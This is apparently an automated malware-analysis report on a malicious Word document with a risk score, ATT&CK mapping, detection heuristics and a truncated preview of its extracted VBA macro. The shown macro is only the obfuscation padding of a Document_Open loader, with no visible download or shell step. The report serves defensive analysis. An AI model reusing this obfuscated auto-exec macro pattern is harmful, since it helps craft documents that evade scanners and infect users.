MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample contains a critical OLE_VBA_SHELL heuristic indicating the use of the Shell() function, and a critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic suggesting an obfuscated auto-exec loader. The Document_Open macro is present and configured to execute code, likely to download and execute a second-stage payload. ClamAV detection further confirms its malicious nature.
Heuristics 7
-
ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25263 bytes |
SHA-256: 0b1828eedc847d8dfc4720cbdf63fb6b4a06948b9818e49a185456d6c52c7624 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
juhBgU = StrReverse("TCquQnhMcixUgk")
SfbQlT = "IRzCdWUQXFEk"
MTidmTs = Replace("xJxeRZGhlqBkd", "xJx", "jYsA")
For PiTST = 0 To 361
cADR = Replace("QCzYfLVtPbrUjcfMx", "QCz", "UsGbDW")
cADR = StrReverse("vwpiXkUSGdfXL")
cADR = Replace("iCfDFFJQtCAR", "iCfD", "nJxt")
cADR = "XQrXjGjZ"
cADR = "mAEbFpDcH"
cADR = StrReverse("ussDWmkyDjlSXqB")
cADR = StrReverse("kLerzOedtIBE")
cADR = Replace("nTMiABZrXbz", "nTM", "lDsMHPB")
cADR = Replace("vVDhBwcsjKisESyh", "vVDh", "juBHr")
cADR = Replace("EnEBwlQfrOgwVWkAJO", "EnEB", "OMnrBwI")
cADR = StrReverse("xfWReMOZJyhYZf")
cADR = StrReverse("zIucqPLoiIYxi")
cADR = "hHSMlwVatt"
cADR = "BrlFoD"
cADR = "uwJULrKOP"
cADR = Replace("kxReDIjEKLDAw", "kxR", "WWDZvA")
cADR = Replace("skxfgQCIFCDuRXFC", "skxf", "DYWkDf")
cADR = Replace("QxpFBQqxqrr", "Qxp", "pOHK")
cADR = Replace("jFxTxnmpeBHgmMof", "jFx", "rEMeJ")
cADR = StrReverse("ltgcRDZdJBq")
cADR = Replace("lqRpJFYYPZFDmDdHo", "lqRp", "Iqtpl")
cADR = "vxcDHfPweq"
cADR = StrReverse("PEOdJgTcskwBaznY")
cADR = "jPJTOy"
cADR = StrReverse("eaTuKkJtbMKsf")
Next PiTST
buICYJK = "hrJYfzam"
For FOdqv = 0 To 88
VabX = "avtHoBTIpknK"
VabX = Replace("wKuiezFGxSIPeRP", "wKui", "PizkD")
VabX = StrReverse("xwuToIkepsyKZ")
VabX = StrReverse("FIZIkySvJTTARdGy")
VabX = Replace("vslpBkjzKVF", "vslp", "Qwqpo")
VabX = Replace("BcCLzRidyg", "BcC", "zpSXaje")
VabX = StrReverse("cSIUerVQyPOqHAXlGb")
VabX = StrReverse("MimoSpfgLaCKkQUb")
VabX = "oAIuzetATRsP"
VabX = Replace("WtSXeDfOeSRZnbcrH", "WtS", "OMEVHP")
VabX = StrReverse("GPxoDOwwBEUMsJgy")
VabX = StrReverse("vyboaJAeVvKyHZFJ")
VabX = Replace("zZkIiMADdfmjICdiSK", "zZk", "FMrT")
VabX = Replace("LBRuZBhgasgyuPTSeMg", "LBR", "qredBmU")
VabX = StrReverse("ZgRaKkenZtk")
VabX = Replace("BigaMrCYqPYV", "Biga", "htzPM")
VabX = StrReverse("IeVPseKRvX")
VabX = "iTqFvCRYvLK"
VabX = Replace("HaSZlqareX", "HaSZ", "TrfSg")
VabX = Replace("LOiKfKRoWRaxEio", "LOi", "FEEjecK")
VabX = Replace("HdjHbrvPSRO", "HdjH", "GMlqXcj")
VabX = StrReverse("PfgjJxdOnPJuXmqCzU")
VabX = StrReverse("esyXfTHXDnMJoVwE")
VabX = StrReverse("FWVeVHkSvzHYvcR")
VabX = Replace("MhXZGOdShTiph", "MhXZ", "ZkOz")
Next FOdqv
For AjyQW = 0 To 140
zbgG = Replace("IvtVVaQrCzzcLxYI", "Ivt", "mbkR")
zbgG = Replace("aDXAeBRQgSWPL", "aDX", "QuQZH")
zbgG = StrReverse("zuXUmklBVLDzx")
zbgG = Replace("wVWVlWOWEQRRif", "wVW", "DvVfd")
zbgG = "zDBPhuTQOvnJ"
zbgG = Replace("TGfCkuXlyLMnwtWo", "TGf", "Blxgdto")
zbgG = StrReverse("sjWrJpxAwH")
zbgG = Replace("vDUsnzohcKO", "vDU", "eJbIicw")
zbgG = Replace("AknSYRByLQgSyWke", "AknS", "MsZMP")
zbgG = "qbXZcv"
zbgG = "pJybkqAYplmZc"
zbgG = StrReverse("LjMRzGVEZYdbQBpGLj")
zbgG = "wDFlGb"
zbgG = "ILnMLKIOHil"
zbgG = StrReverse("mpjbVxzSyBA")
zbgG = Replace("dblzvFEtWJyZye", "dblz", "Ppkk")
zbgG = StrReverse("ZQGAjyDMtHf")
zbgG = StrReverse("lJadpbZDJaoziXkGM")
zbgG = "ZvEShn"
zbgG = StrReverse("oDHBsxrxrVYrE")
zbgG = Replace("gIyuOTpEZKLvBgyMUqT", "gIyu", "beDX")
zbgG = StrReverse("DdCimfPgVyRvcVdpYO")
zbgG = StrReverse("vUJURMQGwb")
zbgG = StrReverse("nGZMmpOHlZQUDwlHDQ")
zbgG = StrReverse("xJeDgCuDaasopmiQ")
Next
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.